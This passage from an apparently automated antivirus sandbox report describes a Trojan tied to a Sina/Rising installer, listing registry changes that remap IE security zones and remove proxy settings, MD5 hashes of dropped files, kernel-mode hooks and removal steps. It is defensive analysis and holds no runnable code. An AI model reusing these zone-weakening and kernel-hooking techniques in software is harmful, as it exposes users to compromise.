"ProxyOverride"
The process RsMgrSvc.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 DD 3B EF 72 CA 10 6B 78 F6 92 8F CE 54 35 BB"
The process ravmond.exe:1328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 C8 C6 39 B4 25 F3 1C 00 C4 2D E8 EB 1F F4 C8"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\rising\RAV\cfg\EnhancedSelfProtect\State]
"(Default)" = "1"
[HKLM\System\CurrentControlSet\Services\kguard]
"stat" = "3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process ravmond.exe:1848 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 20 BE D6 41 A3 F8 AB 80 E5 02 FE 1A 6E 8B F3"
The process SinaInstall_567015.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CD 5C 3B 67 03 DC D7 BA A9 20 F4 D9 63 0A 8B 2F"
The process SinaInstall_567015.exe:1296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015070920150710\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheRepair" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CachePrefix" = ":2015070920150710:"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015070920150710]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 55 44 AD B4 C5 76 E0 C3 2D 4E 20 1A 21 FE 52"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014040820140409]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| d0f2416807f04c559e6394a0a4c7f1d1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\796953180\LZMA.dll |
| 98bcf9984144a0de279078241ef7c3ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\796953180\skinconfig\unrar.dll |
| 4bf3b0c552a575f4a0d09bf74e4083dd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\CfgDll.dll |
| 1f35136daa23c794a9561b46db35d5a5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll |
| 787524b75ce2e55ed671a5cd596d2b36 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\RsBackup.exe |
| 8b287372151ae026ae02cefece7f538e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe |
| 7a762be1d46bb1ed07eacec047cbd1cc | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\RsStub.exe |
| 8353f3fdd33da4187b4411a51122174d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll |
| 6e2517fd1ced9878e60075e1e696b408 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\Setup.exe |
| 0f0aa3f8b1ceab59168724a6037c8a8b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudnet.dll |
| 6e80cfd8dc6d4dff870b8b4dfc796c7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll |
| 9941a9a12196696c1fa9bb6d6442d359 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll |
| 67d42ba1ef54c485a5a879b0aee066db | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudqry\rscurl.dll |
| d5a4de2ba24c733642355d25357fa4b6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudv3\Cloudv3.dll |
| 063510e07cfb8b97cbbcaf3ed4aabb03 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll |
| d3caa6caedf1b4e183b26efd8c95f6ad | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll |
| e4459e014cb9c8fc06ee0c3ccded66d3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll |
| 78f5881af930e81a9ffb246402b6a6e2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll |
| 92aa0e6a0be8766a98a74f05d202d4c3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\comx3.dll |
| 2649f027aa2dae21a4d87419c7b98e46 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsndisp.sys |
| 5ed47386e7b9fa59270555d8439325ab | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys |
| a2a329f69ecdc7dcc297454f1985064f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys |
| 02342ba3a87b3974d612c15275c29446 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll |
| c2c8f37702fcc84f10e70772f79081c7 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys |
| a86b29a69472d5e5f624c6f6c2b2bbfa | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll |
| ce1bd850367d321b3ee2f867db6623e1 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll |
| 9ca6368d7bb34f15b542f9773e0acd18 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat |
| 595587c6d7366726203885f14a1dfc32 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys |
| 15111481a4eead86edeeb2c90a6070a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys |
| 1ac62583254fc92a143c4780489c3762 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll |
| 53389a0314cf0f7dcbb2a3b1ad0631e2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon.sys |
| 5a866622a428d8dd979751975ab881f5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll |
| 7864be756f44fca55c58601b765d963f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\localopt.dll |
| 0a44f63c07112bb325aac94321ae8ff6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll |
| 28d944cae5632248d3a546aaf7601160 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe |
| ef1bc9d6a13e8ccaf50ac6ae9095f28e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\monbasedui\rscombas.dll |
| 00a45353f419bc4891645f1ad0150617 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll |
| 78b62e4c13378f737603136975a07e1a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\mscrt9\atl90.dll |
| 874c8b1317c58ffe62d4d6aa591eabe2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll |
| f1f9eeef647cfa62a7104c054ce0999b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll |
| 9fc8d62cd7e5c9db50b515c26b968e00 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\popwndexe.exe |
| 90d4e96dbbcff68690f37736655fada3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico |
| 270f42646170f2545c25a43f732532fb | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\RavSetup.dll |
| 68d18a0915bbda36e573d5dbb9e6ea8e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico |
| 7d6bc107cd29293b274577d755662d05 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll |
| 249a270469f151ec278c95d63a3fbf79 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll |
| 23d683209cef821f78ae2751d07455e4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\rspalvd.dll |
| d3b9432cc4ccf146a47c36e4428ba2c0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat |
| e28dd24338cae534a54a14d33020cbe9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravconfig\mergexml.dll |
| 62de362c75022744c5149e03d1191fff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll |
| 08dcba43400dc71b8145a30c6f0b55da | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravlog\rslog.dll |
| 4f4500ee19410043cc338668d28f95a3 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll |
| f5857084201bd2f578b2c04c12cc2ac8 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe |
| ef56ceeafa7b2464f44da3b3a46702f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe |
| e8c78de68ec8e77e27af803074b08ce5 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll |
| fbc567d59b385341c53338ca58c3e248 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll |
| 7ae91c40093e829a971616b1e2f9113e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll |
| bd57bcbbed105791aba2b968354e466c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll |
| 7a80c5c9e6955622d45ae9bdf86472ff | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll |
| 4918a3e5256d45c5ca1dea6a2592ca88 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll |
| 82387571279847d2324297ea4722e14f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll |
| 9e58445a57ead0fd320fcc58ec173c3c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll |
| b4f78b19eed6248a10f3031baac0b517 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\rssqlite.dll |
| 6beba6b5b2e5e5ce840cf7c02f3fb657 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rscomm\syslay.dll |
| 72aec55622cac794f6525a6f9411ed3f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll |
| 9dd8dfd3e7359021dcfa5e91537bafab | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk.dll |
| 904607ed3d2e8a29c13dcaf80cb311a9 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll |
| 12d2d81f07d7557cb4fbe3af6a3ea9f6 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll |
| 2349983d784ed407a64f274acb8d4b18 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll |
| 5bb8c8a5a7abac3b8478b254956ab580 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll |
| b19eaceaf35f2db4976db8da259a498d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll |
| 3cc9f8d9db63e973433637945232fff4 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll |
| 412638fde23d2ba33aa194a67165866f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll |
| af1b1fca64556fab4ce9c09e1dac4b96 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rslang.dll |
| 0353146a43705ff783ee2a6109f232df | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmginfo.dll |
| 293a4453521432a09712b7ba715cb951 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll |
| c50714810dcd88daee4dea6e098e4d6a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\bacore.dll |
| dad3c0290a40f4efdab971fc0d316e35 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll |
| 21e45757451e136934cd235b8bcfb27d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll |
| 4fd2a695c22336cf6f802d697d0f6f6c | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\monrule.dll |
| 9ea2304fae8880ab11a3fc9df60be008 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll |
| 783749a918b23b8a581b48284d18a3a2 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\setup.dat |
| 66e3df00feb94c09d687a6d544c1e909 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\RsdSfxTmp\updater.exe |
| ebc1f8559b8bf4c5000c97e2c2fe1c2b | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SinaInstall_567015.exe |
| 5e3d03e6f3f265a1e6fccf0db840bb0e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss2.tmp\3.dll |
| 00a0194c20ee912257df53bfe258ee4a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss2.tmp\System.dll |
| 76d2faad042161f24b6c9c78de3bd265 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nss2.tmp\xID.dll |
| ebc1f8559b8bf4c5000c97e2c2fe1c2b | c:\SinaInstall_567015.exe |
| 1c69e95ff3b9ba125bba829c24e76946 | c:\install1403380.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\DRIVERS\rsndisp.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\kguard.sys" the Trojan controls creation and closing of processes by installing the process notifier.
Using the driver "%System%\DRIVERS\rsndisp.sys" the Trojan controls creation and closing of threads by installing the thread notifier.
Using the driver "%System%\DRIVERS\rsndisp.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.
Using the driver "%System%\DRIVERS\sysmon.sys" the Trojan controls operations with a system registry by installing the registry notifier.
The Trojan installs the following kernel-mode hooks:
KeUserModeCallback
ZwTerminateProcess
ZwAssignProcessToJobObject
ZwClose
ZwConnectPort
ZwCreateKey
ZwCreateMutant
ZwCreateProcess
ZwCreateProcessEx
ZwCreateSection
ZwCreateSymbolicLinkObject
ZwCreateThread
ZwDebugActiveProcess
ZwDuplicateObject
ZwEnumerateValueKey
ZwFreeVirtualMemory
ZwLoadDriver
ZwLockVirtualMemory
ZwOpenKey
ZwOpenProcess
ZwOpenSection
ZwProtectVirtualMemory
ZwQueryDirectoryFile
ZwQuerySystemInformation
ZwQueryValueKey
ZwQueueApcThread
ZwReadVirtualMemory
ZwRequestWaitReplyPort
ZwRestoreKey
ZwSecureConnectPort
ZwSetContextThread
ZwSetInformationProcess
ZwSetSecurityObject
ZwSetSystemInformation
ZwSetSystemTime
ZwSuspendProcess
ZwSuspendThread
ZwSystemDebugControl
ZwTerminateProcess
ZwTerminateThread
ZwUnmapViewOfSection
ZwWriteVirtualMemory
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
popwndexe.exe:592
install1403380.exe:1196
RsMgrSvc.exe:468
ravmond.exe:1328
ravmond.exe:1848
SinaInstall_567015.exe:604
SinaInstall_567015.exe:1296 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\DOCUMENTS AND SETTINGS (4 bytes)
%WinDir%\Temp\Perflib_Perfdata_7b8.dat (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller (4 bytes)
%System%\wbem\Logs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jindutiao.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_03.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\delete.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (400 bytes)
%WinDir%\Temp\scs3.tmp (33880 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check1.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_03.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\bg_01.png (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\input_01.png (4 bytes)
%WinDir%\REGISTRATION (4 bytes)
C:\$Directory (1304 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\change.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\btn_change02.png (4 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\finish.png (12 bytes)
%System%\drivers (32 bytes)
%WinDir%\Temp\scs4.tmp (10145 bytes)
%Documents and Settings%\%current user%\Cookies (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\check-box.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\796953180\skinconfig\ĬÈÃÂÂ\ui\InStaller\jieya_button.png (12 bytes)
%Documents and Settings%\%current user%\LOCAL SETTINGS (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\TN7V2XRD\Opendownloadernewxml[1].htm (900 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (1385 bytes)
%Program Files%\Rising\RAV\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (140 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RAV\moncomm.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (278 bytes)
%Program Files%\Rising\RAV\setup.dat (601 bytes)
%Documents and Settings%\All Users\Application Data\Rising\Rav\ShortCut\Repair.url (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RAV\12345678.000 (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (1660 bytes)
